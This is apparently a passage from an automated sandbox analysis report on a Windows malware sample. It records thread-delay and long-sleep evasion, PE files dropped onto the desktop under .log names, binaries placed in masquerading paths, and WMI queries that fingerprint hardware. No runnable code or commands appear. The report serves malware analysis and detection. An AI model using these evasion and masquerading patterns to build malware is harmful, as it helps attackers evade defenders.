Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 592778
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 592672
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 592562
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 592453
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 922337203685477
Source: C:\ServerfontSessiondhcpcommon\System.exe	Thread delayed: delay time: 922337203685477
Source: C:\ServerfontSessiondhcpcommon\System.exe	Thread delayed: delay time: 922337203685477
Source: C:\ServerfontSessiondhcpcommon\System.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Window / User API: threadDelayed 7213	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Window / User API: threadDelayed 2571	Jump to behavior
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Window / User API: threadDelayed 4813
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Window / User API: threadDelayed 4937

Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\DRWwxNDB.log	Jump to dropped file
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\xRmeReqW.log	Jump to dropped file
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\MnYteEKs.log	Jump to dropped file
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\OyuueWqt.log	Jump to dropped file
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\wcGwEkbJ.log	Jump to dropped file
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\VWrJOgQa.log	Jump to dropped file
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\fFKZyJVH.log	Jump to dropped file
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\aQQAtfnE.log	Jump to dropped file
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\GQkmowWr.log	Jump to dropped file
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\GKmeiJoz.log	Jump to dropped file
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\eIjRcJGM.log	Jump to dropped file
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\nzxGUrLb.log	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\DC.exe

Evasive API call chain: GetLocalTime,DecisionNodes

graph_3-23529

Source: C:\Users\user\Desktop\Dfim58cp4J.exe TID: 5128	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe TID: 5128	Thread sleep time: -31359464925306218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe TID: 5128	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe TID: 5128	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe TID: 2760	Thread sleep count: 7213 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe TID: 2760	Thread sleep count: 2571 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe TID: 5128	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe TID: 5128	Thread sleep time: -599671s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe TID: 5128	Thread sleep time: -599562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe TID: 5128	Thread sleep time: -599453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe TID: 5128	Thread sleep time: -599343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe TID: 5128	Thread sleep time: -599231s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe TID: 5128	Thread sleep time: -599125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe TID: 5128	Thread sleep time: -598987s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe TID: 5128	Thread sleep time: -598859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe TID: 5128	Thread sleep time: -598692s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe TID: 5128	Thread sleep time: -598549s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe TID: 5128	Thread sleep time: -598422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe TID: 5128	Thread sleep time: -598312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe TID: 5128	Thread sleep time: -598203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe TID: 5128	Thread sleep time: -598093s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe TID: 5128	Thread sleep time: -597984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe TID: 5128	Thread sleep time: -597874s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe TID: 5128	Thread sleep time: -597765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe TID: 5128	Thread sleep time: -597656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe TID: 5128	Thread sleep time: -597547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe TID: 5128	Thread sleep time: -597437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe TID: 5128	Thread sleep time: -597328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe TID: 5128	Thread sleep time: -597218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe TID: 5128	Thread sleep time: -597109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe TID: 5128	Thread sleep time: -597000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe TID: 5128	Thread sleep time: -596890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe TID: 5128	Thread sleep time: -596781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe TID: 5128	Thread sleep time: -596672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe TID: 5128	Thread sleep time: -596562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe TID: 5128	Thread sleep time: -596452s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe TID: 5128	Thread sleep time: -596343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe TID: 5128	Thread sleep time: -596036s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe TID: 5128	Thread sleep time: -595909s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe TID: 5128	Thread sleep time: -595781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe TID: 5128	Thread sleep time: -595672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe TID: 5128	Thread sleep time: -595561s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe TID: 5128	Thread sleep time: -595453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe TID: 5128	Thread sleep time: -595343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe TID: 5128	Thread sleep time: -595234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe TID: 5128	Thread sleep time: -595125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe TID: 5128	Thread sleep time: -595015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe TID: 5128	Thread sleep time: -594906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe TID: 5128	Thread sleep time: -594796s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe TID: 5128	Thread sleep time: -594687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe TID: 5128	Thread sleep time: -594578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe TID: 5128	Thread sleep time: -594468s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe TID: 5128	Thread sleep time: -594359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe TID: 5128	Thread sleep time: -594249s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe TID: 5128	Thread sleep time: -594140s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe TID: 5128	Thread sleep time: -594025s >= -30000s	Jump to behavior
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe TID: 4136	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe TID: 6720	Thread sleep time: -30000s >= -30000s
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe TID: 6820	Thread sleep time: -26747778906878833s >= -30000s
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe TID: 6820	Thread sleep time: -600000s >= -30000s
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe TID: 6820	Thread sleep time: -599836s >= -30000s
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe TID: 6820	Thread sleep time: -599391s >= -30000s
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe TID: 6820	Thread sleep time: -599141s >= -30000s
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe TID: 6820	Thread sleep time: -599000s >= -30000s
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe TID: 6820	Thread sleep time: -598719s >= -30000s
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe TID: 5568	Thread sleep time: -600000s >= -30000s
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe TID: 6820	Thread sleep time: -598500s >= -30000s
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe TID: 6820	Thread sleep time: -598390s >= -30000s
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe TID: 6820	Thread sleep time: -598219s >= -30000s
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe TID: 6820	Thread sleep time: -598016s >= -30000s
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe TID: 6820	Thread sleep time: -597844s >= -30000s
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe TID: 6820	Thread sleep time: -597563s >= -30000s
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe TID: 6820	Thread sleep time: -597450s >= -30000s
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe TID: 6820	Thread sleep time: -597266s >= -30000s
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe TID: 5568	Thread sleep time: -7200000s >= -30000s
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe TID: 6820	Thread sleep time: -596734s >= -30000s
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe TID: 6820	Thread sleep time: -596625s >= -30000s
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe TID: 6820	Thread sleep time: -596488s >= -30000s
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe TID: 6820	Thread sleep time: -596359s >= -30000s
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe TID: 6820	Thread sleep time: -596188s >= -30000s
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe TID: 6820	Thread sleep time: -596062s >= -30000s
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe TID: 6820	Thread sleep time: -595953s >= -30000s
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe TID: 6820	Thread sleep time: -595844s >= -30000s
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe TID: 6820	Thread sleep time: -595734s >= -30000s
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe TID: 6820	Thread sleep time: -595625s >= -30000s
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe TID: 6820	Thread sleep time: -595488s >= -30000s
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe TID: 6820	Thread sleep time: -595375s >= -30000s
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe TID: 6820	Thread sleep time: -595266s >= -30000s
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe TID: 6820	Thread sleep time: -595125s >= -30000s
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe TID: 6820	Thread sleep time: -595013s >= -30000s
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe TID: 6820	Thread sleep time: -594906s >= -30000s
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe TID: 6820	Thread sleep time: -594786s >= -30000s
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe TID: 6820	Thread sleep time: -594666s >= -30000s
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe TID: 6820	Thread sleep time: -594562s >= -30000s
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe TID: 6820	Thread sleep time: -594441s >= -30000s
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe TID: 6820	Thread sleep time: -594304s >= -30000s
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe TID: 6820	Thread sleep time: -594203s >= -30000s
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe TID: 6820	Thread sleep time: -594094s >= -30000s
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe TID: 6820	Thread sleep time: -593980s >= -30000s
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe TID: 6820	Thread sleep time: -593875s >= -30000s
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe TID: 6820	Thread sleep time: -593762s >= -30000s
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe TID: 6820	Thread sleep time: -593656s >= -30000s
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe TID: 6820	Thread sleep time: -593542s >= -30000s
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe TID: 6820	Thread sleep time: -593434s >= -30000s
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe TID: 6820	Thread sleep time: -593327s >= -30000s
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe TID: 6820	Thread sleep time: -593214s >= -30000s
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe TID: 6820	Thread sleep time: -593102s >= -30000s
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe TID: 6820	Thread sleep time: -593000s >= -30000s
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe TID: 6820	Thread sleep time: -592891s >= -30000s
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe TID: 6820	Thread sleep time: -592778s >= -30000s
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe TID: 6820	Thread sleep time: -592672s >= -30000s
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe TID: 6820	Thread sleep time: -592562s >= -30000s
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe TID: 6820	Thread sleep time: -592453s >= -30000s
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe TID: 2380	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ServerfontSessiondhcpcommon\System.exe TID: 1268	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ServerfontSessiondhcpcommon\System.exe TID: 316	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ServerfontSessiondhcpcommon\System.exe TID: 6764	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem

Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\ServerfontSessiondhcpcommon\System.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\ServerfontSessiondhcpcommon\System.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\ServerfontSessiondhcpcommon\System.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Local\Temp\DC.exe	Code function: 3_2_00BDA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	3_2_00BDA69B
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Code function: 3_2_00BEC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	3_2_00BEC220
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Code function: 3_2_00BFB348 FindFirstFileExA,	3_2_00BFB348

Source: C:\Users\user\AppData\Local\Temp\DC.exe

Code function: 3_2_00BEE6A3 VirtualQuery,GetSystemInfo,

3_2_00BEE6A3

Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 599231	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 598987	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 598859	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 598692	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 598549	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 598422	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 598312	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 598093	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 597874	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 597765	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 597328	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 597218	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 597109	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 597000	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 596890	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 596781	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 596672	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 596562	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 596452	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 596343	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 596036	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 595909	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 595781	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 595672	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 595561	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 595453	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 595343	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 595125	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 595015	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 594906	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 594796	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 594687	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 594468	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 594359	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 594249	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 594140	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 594025	Jump to behavior
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 30000
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 600000
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 599836
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 599391
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 599141
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 599000
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 598719
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 300000
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 598500
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 598390
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 598219
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 598016
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 597844
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 597563
